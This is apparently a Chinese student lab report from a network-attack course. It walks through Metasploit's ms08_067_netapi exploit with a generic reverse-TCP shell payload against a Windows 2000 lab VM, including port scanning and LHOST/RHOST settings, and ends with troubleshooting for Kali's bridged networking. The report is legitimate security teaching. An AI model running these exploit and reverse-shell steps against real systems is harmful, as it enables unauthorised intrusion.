Exp5 MSF基础应用

Exp5 MSF基础应用

实践内容

  • 主动攻击:ms08_067
    • exploit/windows/smb/ms08_067_netapi
    • generic/shell_reverse_tcp

实践步骤

主动攻击ms08_067

靶机:Win2kServer_SP0_target 10.1.1.119
漏洞:exploit/windows/smb/ms08_067_netapi
payload : generic/shell_reverse_tcp

  • 将Kali和靶机都改为桥接模式,ping通Exp5 MSF基础应用
    Exp5 MSF基础应用

  • msfconsole进入msf控制台
  • 搜索相关模块,找到对应的攻击模块exploit/windows/smb/ms08_067_netapi,可知这是一个针对windows-smb的攻击模块

SMB(全称是Server Message Block)是一个协议名,它能被用于Web连接和客户端与服务器之间的信息沟通。SMB最初是IBM的贝瑞·费根鲍姆(Barry Feigenbaum)研制的,其目的是将DOS操作系统中的本地文件接口“中断13”改造为网络文件系统。

Exp5 MSF基础应用

  • info命令查看exploit/windows/smb/ms08_067_netapi的相关信息,比如存在该漏洞的目标主机类型、基础设置等
    Exp5 MSF基础应用
    Exp5 MSF基础应用

445端口是SMB服务端口

  • 选择漏洞,搜索靶机可用端口
use exploit/windows/smb/ms08_067_netapi   //选择漏洞
show options                              // 显示设置
set RHOSTS 10.1.1.119                     //设置靶机IP
search portscan                           //扫描端口,查找可用模块
use auxiliary/scanner/portscan/tcp        //使用auxiliary/scanner/portscan/tcp模块
show options
set RHOSTS 10.1.1.119                     //设置IP
exploit

Exp5 MSF基础应用
Exp5 MSF基础应用

  • 445端口已开放Exp5 MSF基础应用

  • 查看可用payload,选择一般类的(generic),tcp回连
use exploit/windows/smb/ms08_067_netapi
show payloads

Exp5 MSF基础应用

  • 配置端口等信息
set payload generic/shell_reverse_tcp
show options
set LHOST 10.1.1.178   //kali的ip

Exp5 MSF基础应用

  • exploit进行渗透攻击Exp5 MSF基础应用

遇到的问题及解决方案

  • Kali改为桥接模式以后,无法获取ip地址
    Exp5 MSF基础应用

    • 检查VMware桥接的网卡选择是否正确,虚拟网络编辑器的VMnet0应“桥接到”与本机网卡地址一致Exp5 MSF基础应用
      Exp5 MSF基础应用

    • cat /etc/resolv.conf 检查DNS服务器,nameserver后面的ip地址应该与本机路由器ip一致Exp5 MSF基础应用

    • cat /etc/network/interfaces 检查默认网络信息配置文件,是否与下图一致,不一致则手动输入更改Exp5 MSF基础应用

    • /etc/init.d/networking restart 重启网络配置
    • 成功获取ipExp5 MSF基础应用

https://blog.csdn.net/gw_csdn/article/details/84992696

上一篇:2018-2019-2 网络对抗技术 20165301 Exp5 MSF基础应用


下一篇:CS + MSF 联动